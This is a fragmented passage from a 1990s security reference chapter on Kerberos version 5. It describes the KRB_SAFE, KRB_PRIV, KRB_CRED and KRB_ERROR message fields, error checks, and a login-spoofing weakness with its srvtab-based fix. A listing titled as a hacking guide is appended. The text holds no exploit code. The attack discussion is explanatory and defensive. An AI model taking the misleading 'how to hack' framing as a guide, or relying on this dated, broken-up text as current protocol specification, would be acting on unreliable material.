The KRB_SAFE message contains user data along with a collision-proof checksum keyed with
the session key
...
9
...
9
KRB_SAFE Message Fields
Field

Description

pvno and msg-type

Described earlier
...


safe-body

Serves as a placeholder for the body of the KRB-SAFE message
...


cksum

Contains the checksum of the application data
...


user-data

Part of the KRB_SAFE and KRB_PRIV messages
...


timestamp

Part of the KRB_SAFE and KRB_PRIV messages
...
By checking the
timestamp, the recipient of the message is able to make sure that it was
recently generated, and is not a replay
...
It contains the
microsecond part of the timestamp
...

continues

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

600

Part II: Gaining Access and Securing the Gateway

Table 9
...


r-address

Specifies the address in use by the recipient of the message
...
This field, along with s-address,
can be used to help detect messages that have been incorrectly or
maliciously delivered to the wrong recipient
...


Generation of a KRB_PRIV Message
When an application needs to send a KRB_PRIV message, it collects its data and the appropriate control information and encrypts them under an encryption key, usually the last key
negotiated via subkeys, or if no negotiation has occurred, the session key
...
After the
user data and control information are encrypted, the client transmits the ciphertext and some
“envelope” information to the recipient
...
If any error
occurs, an error code is reported for use by the application
...
A mismatch generates a
KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
If decryption shows the data to
have been modified, a KRB_AP_ERR_BAD_INTEGRITY error is generated
...
If a recipient address is specified or the recipient requires an address, then it
checks that one of the recipient’s addresses appears as the recipient’s address in the message
...

Then the timestamp and usec and/or the sequence number fields are checked
...
If the server name along with the client name, time,

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

601

Kerberos

and microsecond fields from the Authenticator match any recently seen such tuples, the
KRB_AP_ERR_REPEAT error is generated
...
If neither a timestamp and usec nor a sequence number is present, a
KRB_AP_ERR_MODIFIED error is generated
...


KRB_PRIV Message Specification
This section specifies the format of a message that can be used by either side, client or server,
of an application to send, securely and privately, a message to its peer
...


KRB_PRIV Definition
The KRB_PRIV message contains user data encrypted in the Session Key
...
10 describes the fields for this message
...
10
KRB_PRIV Message Fields
Field

Description

pvno and msg-type

Described earlier
...


enc-part

Holds an encoding of the EncKrbPrivPart sequence encrypted under
the session key
...

continues

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

602

Part II: Gaining Access and Securing the Gateway

Table 9
...


seq-number

Described earlier
...
It achieves this by sending the tickets together with
encrypted data that contain the session keys and other information associated with the tickets
...
Then it uses the ticket or tickets it obtains to construct a KRB_CRED
message
...

Other information associated with each ticket and obtained during the KRB_TGS exchange
also is placed in the corresponding KrbCredInfo sequence in the encrypted part of the
KRB_CRED message
...
It is then encrypted under an encryption key previously exchanged in the KRB_AP
exchange
...
If any error occurs, an error
code is reported for use by the application
...
A
mismatch generates a KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
If
decryption shows the data to have been modified, a KRB_AP_ERR_BAD_INTEGRITY error
is generated
...

Next it checks that one of the recipient’s addresses appears as the recipient’s address in the
message
...
The

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

timestamp and usec fields, and the nonce field if required, are checked next
...

If all the checks succeed, the application stores each of the new tickets in its ticket cache
together with the session key and other information in the corresponding KrbCredInfo
sequence from the encrypted part of the KRB_CRED message
...
It presumes that a session key has already been exchanged
perhaps by using the KRB_AP_REQ/KRB_AP_REP messages
...
The information needed to use the tickets
is encrypted under an encryption key previously exchanged
...
11 describes the fields in this message
...
11
KRB_CRED Message Fields
Field

Description

pvno and msg-type

Described earlier
...


tickets

The tickets obtained from the Key Distribution Center specifically
for use by the intended recipient
...


enc-part

Holds an encoding of the EncKrbCredPart sequence encrypted
under the session key shared between the sender and the intended
recipient
...


nonce

If practical, an application may require the inclusion of a nonce
generated by the recipient of the message
...
A nonce
must never be reused
...
The
time is used to provide assurance that the message is fresh
...
Used to provide additional assurance of the
integrity of the KRB-CRED message
...


The following fields are optional
...
If left out, it is assumed that the recipient of the credentials already knows
their value
...


lags, authtime, starttime,
endtime, renew-till,
srealm, sname, and
caddr

p1vPHCP/nhb1

Description

Contain the values of the corresponding fields from the
ticket found in the ticket field
...


Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Names
Kerberos realms are encoded as GeneralString
...
Most realms consist of several components separated by periods (
...
500 names
...
Specifies the type of name that follows
...
Encodes a sequence of components that form a name
...
Taken together, a PrincipalName and a Realm form a
principal identifier
...
No two names can be the same
...


Time
The timestamps used in Kerberos are encoded as GeneralizedTime
...
It further
cannot include any separators
...


Host Addresses
Kerberos messages usually contain a reference to a specific host, or a list of hosts
...
A host address is a sequence of components consisting
of the following subfields:
HostAddress =

{
addr-type[0]
address[1]
}

INTEGER,
BYTE STRING

HostAddresses = {
addr-type[0]
address[1]
}

INTEGER,
BYTE STRING

The host address encoding consists of the following two fields:

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

605

606

Part II: Gaining Access and Securing the Gateway

s addr-type
...

s address
...

The two forms differ slightly
...
HostAddresses
contains a sequence of possibly many addresses
...
Specifies the format for the ad-data subfield
...
Non-negative values are reserved for registered use
...
Contains authorization data to be interpreted according to the value of the
corresponding ad-type field
...
The contents
of this field should be displayed to users to enable them to detect unauthorized use of their
account
...
12 describes the fields in this message
...
12
Last Request Fields
Field

Description

lr-type

Indicates how the following lr-value field is to be interpreted
...
Non-negative
values pertain to all servers for the realm
...


Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Field

Description
1

Time of last initial request for a Ticket Granting Ticket
...


3

Time of issue for newest Ticket Granting Ticket used
...


5

Time of last request of any type
...
The time must be interpreted according to
the contents of the accompanying lr-type subfield
...
The fields included in the
message are intended to return as much information as possible about an error
...
If the appropriate information is not available during composition of the message, the corresponding field is
left out of the message
...
In particular, this means that the client should not use
any fields in this message for security-critical purposes, such as setting a system clock or
generating a fresh Authenticator
...


KRB_ERROR Definition
The KRB_ERROR message consists of the following fields:
KRB-ERROR = {
pvno[0]
msg-type[1]
ctime[2]
cusec[3]
stime[4]
susec[5]
error-code[6]
crealm[7]
cname[8]
realm[9]
sname[10]
e-text[11]
e-data[12]
}

p1vPHCP/nhb1

INTEGER,
INTEGER,
KerberosTime OPTIONAL,
INTEGER OPTIONAL,
KerberosTime,
INTEGER,
INTEGER,
Realm OPTIONAL,
PrincipalName OPTIONAL,
Realm, — Correct realm
PrincipalName, —
Correct name
GeneralString OPTIONAL,
BYTE STRING OPTIONAL

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

607

608

Part II: Gaining Access and Securing the Gateway

Table 9
...


Table 9
...
msg-type is KRB_ERROR
...


cusec

Described earlier
...


susec

Contains the microsecond part of the server’s timestamp
...


crealm, cname, srealm,
and sname

Described earlier
...
It might include, for example, a principal
name that was unknown
...
If the errorcode is
KDC_ERR_PREAUTH_REQUIRED, the e-data field contains
an encoding of a sequence of padata fields, each corresponding to
an acceptable preauthentication method and optionally containing
data for the method
...
14 describes the fields in this option
...
14
Error Method Field Descriptions
Field

Description

method-type

Indicates the required alternative method
...


Kerberos Workstation Authentication
Problem
Requests for Kerberos Ticket Granting Tickets are sent in plaintext to the Kerberos server,
which responds with credentials encrypted in the requesting principal’s secret key
...

The problem here is that the requesting program cannot know for sure whether the decryption
succeeded or, more importantly, whether the response actually came from the Kerberos server
...
Kerberos eventually responds with an appropriate error, but the attacker can arrange
for another program to deliver a fake response to log in first
...

The solution to this problem is for login to verify the Ticket Granting Ticket by using it to
acquire a service ticket with a known key and comparing the results
...
ticket, where is the local host name, and checking
the response against the key stored in the machine’s /etc/srvtab file
...

The solution works only as long as the host has a srvtab containing an rcmd
...
This is fine for physically secure or single-user workstations, but does not work on public workstations in which anyone could access the srvtab
file
...
append in the MIT Kerberos distribution contains the commonly used port assignments
...
Kerberos has officially

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

609

610

Part II: Gaining Access and Securing the Gateway

been moved to port 88, although people will have to listen on port 750 for some time to come
and assume that many servers won’t be converted to listen to port 88 for some time
...
Furthermore, both of their port
numbers have already been assigned to other services, so requesting an official assignment
forces them to change
...
Their
ports currently aren’t assigned to other services, so hopefully they will not have to change if an
official assignment is requested
...
A separate document, RFC1411, describes how that option is to be used with
Kerberos version 4, but no RFC exists for its use with Kerberos version 5
...
The standard for full encryption remains
under development
...
uu
...
91
...
25
...
Z

It predates both of the earlier-mentioned RFCs, however, and therefore almost certainly isn’t
compliant with them
...
4BSD
telnet/telnetd, also exists, but has been temporarily removed from distribution—probably
because it also does not comply with the proposed standards
...
txt>, which defines
Kerberos version 4 and GSS-API authentication systems
...
bellcore
...
tar
...

The WWW offers much useful information, but it changes frequently enough that listing sites
here would be pointless
...

The main newsgroup is comp
...
kerberos
Title: Hacking - Firewalls And Networks How To Hack Into Remote Computers
Description: 6 niffing and spoofing are security threats that target the lower layers of the networking infrastructure supporting applications that use the Internet. Users do not interact directly with these lower layers and are typically completely unaware that they exist. Without a deliberate consideration of these threats, it is impossible to build effective security into the higher levels. Sniffing is a passive security attack in which a machine separate from the intended destination reads data on a network. The term “sniffing” comes from the notion of “sniffing the ether” in an Ethernet network and is a bad pun on the two meanings of the word “ether.” Passive security attacks are those that do not alter the normal flow of data on a communication link or inject data into the link.